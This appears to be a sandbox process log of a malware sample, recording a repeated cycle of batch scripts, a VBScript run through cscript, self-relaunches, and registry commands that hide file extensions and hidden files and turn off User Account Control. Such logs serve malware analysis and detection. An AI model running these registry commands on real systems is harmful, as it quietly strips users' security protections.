C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\faMwoccs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vkokIsUU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LoYkgcwE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lusIcQMA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ceEgsAwE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uYkYswsM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gsQIwAUw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XicswMsU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZOIMcYwY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HUEcsoQw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KqkUUwYM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wsIAEccQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KkAAIwwg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZakkwQgg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HGgoIMoE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\viooYwoc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OsQEIAEc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UkgEAEUM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oEMggsEI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv iJMzznUMmEynQAb10pZU4w.0.2
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qIsQMYwk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TuQMYcsU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NeQQMYQA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
